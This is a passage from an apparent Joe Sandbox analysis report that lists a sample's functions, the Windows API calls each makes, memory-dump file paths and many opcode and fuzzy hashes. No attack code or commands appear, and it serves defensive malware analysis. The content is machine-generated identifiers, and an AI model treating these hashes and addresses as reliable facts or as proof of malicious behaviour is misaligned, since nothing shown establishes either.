                                                                                    • Opcode Fuzzy Hash: 050828051e2d5ce6fff91235e99d800e07168e1c824034f3d4c28392aae76f2e
                                                                                    • Instruction Fuzzy Hash: B1E06D32E0010EEB8B498AA49C04EEA729DEF08242724457EAD27D7600EB34DE4A57A0
                                                                                    Function 0015A0C3 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00159EF9,?,?,?,00159D92,?,00000001,00000000,?,?), ref: 0015A0D7
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00159EF9,?,?,?,00159D92,?,00000001,00000000,?,?), ref: 0015A108
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: b8fabd5782026cb3d05290c44b2ad2429bf4f8d6921f2070fa562f952b0c7e94
                                                                                    • Instruction ID: 7b5e882d8c67746f4ba1c686d4a0446ffeb948b6ca3822e7e52cab49297ac894
                                                                                    • Opcode Fuzzy Hash: b8fabd5782026cb3d05290c44b2ad2429bf4f8d6921f2070fa562f952b0c7e94
                                                                                    • Instruction Fuzzy Hash: 8CF0A03228010DABDF515F60DC41BEA776DBF08382F448061FD989A060DB329AAC9B90
                                                                                    Function 0016C0D0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemText_swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3011073432-0
                                                                                    • Opcode ID: d294f1971a64e6e2de921668966d94967d03871f4225ab28f551df7e3746f3fa
                                                                                    • Instruction ID: 735c28c280703172f1996b55b609db8753c5e357fb4923d515cf693daf98e6ee
                                                                                    • Opcode Fuzzy Hash: d294f1971a64e6e2de921668966d94967d03871f4225ab28f551df7e3746f3fa
                                                                                    • Instruction Fuzzy Hash: 6BF0EC72554248F7E711B7609C06FE93B2DAB14342F040057F615974E2D7725B709792
                                                                                    Function 00159DAC Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00159611,?,?,0015946C), ref: 00159DBD
                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00159611,?,?,0015946C), ref: 00159DEB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteFile
                                                                                    • String ID:
                                                                                    • API String ID: 4033686569-0
                                                                                    • Opcode ID: 6ee3a92abf593502c17f87959273a671aaf0d6ad6bee5ae8380a8d27ff9722d3
                                                                                    • Instruction ID: b4f3bfcaf88c4002827329c2faf20dd7371c9f2047e2f413ce3f0f0522737bf5
                                                                                    • Opcode Fuzzy Hash: 6ee3a92abf593502c17f87959273a671aaf0d6ad6bee5ae8380a8d27ff9722d3
                                                                                    • Instruction Fuzzy Hash: 2BE09B3164010DE7DB115F61DC41BEA77ADEB093C2F844065BD94CA050DB329D989A90
                                                                                    Function 00159E13 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00159E08,?,001575A0,?,?,?,?), ref: 00159E24
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00159E08,?,001575A0,?,?,?,?), ref: 00159E50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 51d9c904e81abaa06783954eb2e22116f50688e62624473ef1b6fa4f04c14dbe
                                                                                    • Instruction ID: 3d6870ae39bfb131c7319ed5fdf15243ebb1efd9d848e07db3175acd277c30db
                                                                                    • Opcode Fuzzy Hash: 51d9c904e81abaa06783954eb2e22116f50688e62624473ef1b6fa4f04c14dbe
                                                                                    • Instruction Fuzzy Hash: 87E09B3250015897CB51AB68DC05BD9775CDB1C7E2F000161FD68E7190D7715D9C97D0
                                                                                    Function 0015F309 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0015F324
                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0015DEC8,Crypt32.dll,?,0015DF4A,?,0015DF2E,?,?,?,?), ref: 0015F346
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1175261203-0
                                                                                    • Opcode ID: d816feb4d38db87458aa05055faa08554d65f7d027fea2a8513fc79eb6b54ed2
                                                                                    • Instruction ID: eb91227d9186ad07e127ec263c8a00627799f07173da27e5a9752c57c19058a8
                                                                                    • Opcode Fuzzy Hash: d816feb4d38db87458aa05055faa08554d65f7d027fea2a8513fc79eb6b54ed2
                                                                                    • Instruction Fuzzy Hash: 94E0127681115CA7DB51AAA49C09FEB776CEB0C3C2F0440A5B948D2015DB749A94CBF0
                                                                                    Function 00168924 Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00168945
                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0016894C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                    • String ID:
                                                                                    • API String ID: 1918208029-0
                                                                                    • Opcode ID: 42264db8ccb11c0ac0cb23701b7df08b3768c0012ec7e37411ed6ce32fd7cecc
                                                                                    • Instruction ID: 5944046be2c33d01e4b0492145d31499e8c6451a53ff1a0cc14bde2dc83241d6
                                                                                    • Opcode Fuzzy Hash: 42264db8ccb11c0ac0cb23701b7df08b3768c0012ec7e37411ed6ce32fd7cecc
                                                                                    • Instruction Fuzzy Hash: CDE06D71801208EFCB10EF88C9017E9BBE8EB08361F10816AE88493200D770AE149BD2
                                                                                    Function 0016909E Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,0017F79B,000000FF), ref: 001690C7
                                                                                    • CoUninitialize.COMBASE(?,?,?,0017F79B,000000FF), ref: 001690CC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 3856339756-0
                                                                                    • Opcode ID: c4ef99cb75008ab87262faefbe43e342e809fcb035e35688cc24f03592ed66ac
                                                                                    • Instruction ID: 66e70ad70caa7179258f87462c8f2e8f9ed3fa87cc016cc9e347336a4d0b32d7
                                                                                    • Opcode Fuzzy Hash: c4ef99cb75008ab87262faefbe43e342e809fcb035e35688cc24f03592ed66ac
                                                                                    • Instruction Fuzzy Hash: ADE01A32544644AFC314DB8CDD46B56BBE9FB08B20F00876AB81A83B60CB386840CBD1
                                                                                    Function 00170CA6 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00171D9A: try_get_function.LIBVCRUNTIME ref: 00171DAF
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00170CC4
                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00170CCF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                    • String ID:
                                                                                    • API String ID: 806969131-0
                                                                                    • Opcode ID: ee687235bab424e887e66d8af289e7db8e23a4092a2562001d809fec5efa3082
                                                                                    • Instruction ID: 68706d107f95654aa0ebecb0fdb63ff400d17359e6ce4240d63df0524767041a
                                                                                    • Opcode Fuzzy Hash: ee687235bab424e887e66d8af289e7db8e23a4092a2562001d809fec5efa3082
                                                                                    • Instruction Fuzzy Hash: 20D0A739548B01A4690723B4681245A2378992AB747A0C3C6E429951C1DF1441816116
                                                                                    Function 001512C2 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemShowWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3351165006-0
                                                                                    • Opcode ID: 2f630f7b8331a5af02987d4f4c8958b4bd48adc202ccf1999394a67b16c3ce84
                                                                                    • Instruction ID: 584ae0936da80ba48527e2325a7b7adf4bb9ebea99df02a6c0584eca79d89d0f
                                                                                    • Opcode Fuzzy Hash: 2f630f7b8331a5af02987d4f4c8958b4bd48adc202ccf1999394a67b16c3ce84
                                                                                    • Instruction Fuzzy Hash: 74C01232058200BFDB010BB0DC09C2EBBAAAFA5222F00C90AB5A5C00A0C238C560DB12
                                                                                    Function 0015FC30 Relevance: 2.5, APIs: 2, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(00191E74,?,?,?,?,0015A5A0,?,?,?,?,0017F79B,000000FF), ref: 0015FC42
                                                                                    • LeaveCriticalSection.KERNEL32(00191E74,?,?,?,?,0015A5A0,?,?,?,?,0017F79B,000000FF), ref: 0015FC99
                                                                                      • Part of subcall function 0015F9D1: ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0015FA05
                                                                                      • Part of subcall function 0015F9D1: CloseHandle.KERNEL32(?,?), ref: 0015FA1F
                                                                                      • Part of subcall function 0015F9D1: DeleteCriticalSection.KERNEL32(?), ref: 0015FA38
                                                                                      • Part of subcall function 0015F9D1: CloseHandle.KERNELBASE(?), ref: 0015FA44
                                                                                      • Part of subcall function 0015F9D1: CloseHandle.KERNEL32(?), ref: 0015FA50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCriticalHandleSection$DeleteEnterLeaveReleaseSemaphore
                                                                                    • String ID:
                                                                                    • API String ID: 3265325312-0
                                                                                    • Opcode ID: 103a06818c17d958486d74f4d6a114481d540de00feae0fc909a4e6581367954
                                                                                    • Instruction ID: fa730faa6c22c641457ba882d6c73e2ce45c414a7944f47e038593e31071d8c6
                                                                                    • Opcode Fuzzy Hash: 103a06818c17d958486d74f4d6a114481d540de00feae0fc909a4e6581367954
                                                                                    • Instruction Fuzzy Hash: 08F0C833204219EBD6126724EC80D7EB71DDB997A5715013FFC20AB541DB21ACCA47E1
                                                                                    Function 001519B1 Relevance: 1.8, APIs: 1, Instructions: 275COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: d1baa06463b3a79da1ca900fdc3dab35ebb487b78128a8309be3c6660dbd047a
                                                                                    • Instruction ID: c23d863eb35e7d7ab7b7bdccaeeeaa7c18cbd858c770ef17c74a33016ae2e114
                                                                                    • Opcode Fuzzy Hash: d1baa06463b3a79da1ca900fdc3dab35ebb487b78128a8309be3c6660dbd047a
                                                                                    • Instruction Fuzzy Hash: 1CB1C270A00286FFEB1ACF78C485BF9FBA6BF15305F144649E8759B281C731A858CB91
                                                                                    Function 0015820B Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00158210
                                                                                      • Part of subcall function 0015137E: __EH_prolog.LIBCMT ref: 00151383
                                                                                      • Part of subcall function 0015137E: new.LIBCMT ref: 001513FB
                                                                                      • Part of subcall function 001519B1: __EH_prolog.LIBCMT ref: 001519B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 0869ecdf3a052c274ffa2c4310c00cb921ba5abdd461f1aebe86ac10e07c07d6
                                                                                    • Instruction ID: 332d3a4fb3ad1dee8ebcee0e075706465d29ad6af5c5681b16fb59bd83e6ab7d
                                                                                    • Opcode Fuzzy Hash: 0869ecdf3a052c274ffa2c4310c00cb921ba5abdd461f1aebe86ac10e07c07d6
                                                                                    • Instruction Fuzzy Hash: 9741A571941658DADB25EB60CC51BFA7768AF60301F4400EAE8AAAB052DF745FCCDF50
                                                                                    Function 001621E6 Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 522d30f8fc904789860d25b75da7f1032af758006209adc303dc9d333762f2d2
                                                                                    • Instruction ID: 642800abb049a7ad691092452ca91a9964842333638fd0b12cb3cbdb3042c83a
                                                                                    • Opcode Fuzzy Hash: 522d30f8fc904789860d25b75da7f1032af758006209adc303dc9d333762f2d2
                                                                                    • Instruction Fuzzy Hash: E021F8B1F40615ABDB14DFB9DC4266B7668FB14314F00063EE905EB681D7709D60C6E8
                                                                                    Function 00169485 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0016948A
                                                                                      • Part of subcall function 0015137E: __EH_prolog.LIBCMT ref: 00151383
                                                                                      • Part of subcall function 0015137E: new.LIBCMT ref: 001513FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 4101835b8271ada40176e52c3ae65ca47fd4485edfaa3aa72bd3794cdefc6cb0
                                                                                    • Instruction ID: e15890b00ad1fa9452dbb58fb69b2a23648bc554fd7a0b4c6b5dc4dc7d18cf08
                                                                                    • Opcode Fuzzy Hash: 4101835b8271ada40176e52c3ae65ca47fd4485edfaa3aa72bd3794cdefc6cb0
                                                                                    • Instruction Fuzzy Hash: 32214F76D04249EBCF15DF94D9415EEBBB4FF29300F1004AEE819A7202D7356E59CB60
                                                                                    Function 001590D0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: ebd63cd5423e707ab97b1df9f9d226ac9806e462291ca8e4d4547a925033323a
                                                                                    • Instruction ID: cd48cdd48598c13445e4df8b602a113178d285121965c5f6423317e337d917b0
                                                                                    • Opcode Fuzzy Hash: ebd63cd5423e707ab97b1df9f9d226ac9806e462291ca8e4d4547a925033323a
                                                                                    • Instruction Fuzzy Hash: BE117373900929EBCF12AE58CC959EEB735AF98751F004525FC257B211DB349D1887E1
                                                                                    Function 00178EE4 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00175A8D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0017634D,00000001,00000364,?,00172213,?,?,0018CBE8), ref: 00175ACE
                                                                                    • _free.LIBCMT ref: 00178F50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 614378929-0
                                                                                    • Opcode ID: ffe7a698f1ec9d313924040038d8a651e71016dbf9af90b8887af046bf84921e
                                                                                    • Instruction ID: 12108013e8c88d1e0e5a9ea51c1e6f7d6aa22627d5c545bb6e3eec82247f5578
                                                                                    • Opcode Fuzzy Hash: ffe7a698f1ec9d313924040038d8a651e71016dbf9af90b8887af046bf84921e
                                                                                    • Instruction Fuzzy Hash: EA014572240344ABE7218F69C885D5AFBFAEB85370F25462DE18C832C0EB30AC05C774
                                                                                    Function 00175A8D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0017634D,00000001,00000364,?,00172213,?,?,0018CBE8), ref: 00175ACE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
